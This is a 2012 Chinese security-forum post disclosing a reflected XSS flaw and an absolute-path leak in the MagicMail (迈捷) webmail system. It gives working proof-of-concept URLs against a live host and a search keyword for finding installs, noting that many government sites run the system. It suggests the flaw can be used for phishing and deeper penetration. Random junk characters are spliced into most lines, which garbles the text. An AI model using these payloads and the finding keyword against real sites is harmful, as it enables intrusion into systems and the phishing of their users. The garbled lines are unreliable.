找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1876|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! _+ |$ ]$ A9 L6 ^2 X; W
( c( |, O0 i( l! B
6 L9 H5 J; p% p$ |
包含  一个反射性XSS  以及  绝对路径泄漏8 x  G0 G+ y8 W  I6 s5 z( Y; {
看了看 貌似全部是linux的。
+ M5 h/ |$ }5 x2 ? 7 N. s9 H$ U& \) U7 Y) i# [
关键字:迈捷邮件系统 by MagicMail+ T/ s3 i# Q& s0 c% V, [) }
' r1 ^- n8 `4 X; y
可以看到很多政府网站都用这个邮件系统
5 h) `: b" @! t+ S8 W9 f7 X  V% x5 _' c1 T. v7 l# N" w) B
绝对路径 http://madman.in/index.php?login_type=declare&language=' H& _/ M2 }; I5 x: u& D
3 u7 p& S( Z" {0 t9 Z) ^$ t) n

2 H' F# U) n  e7 z$ t1 X# L, i& R% C) D
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E5 T8 K, X1 z8 N

" ]6 |4 M* A8 ?/ [' s$ D' r: i* o7 y$ Z3 l# T8 ]8 k
8 b. @+ Q8 i7 r( h5 z6 Y4 e& C' b
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
; e8 }. j7 g/ L  {) T) ^
: k, p2 v) T" r# Q/ [; F修复方案:看官方补丁吧。8 D+ E; C  j1 f; E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表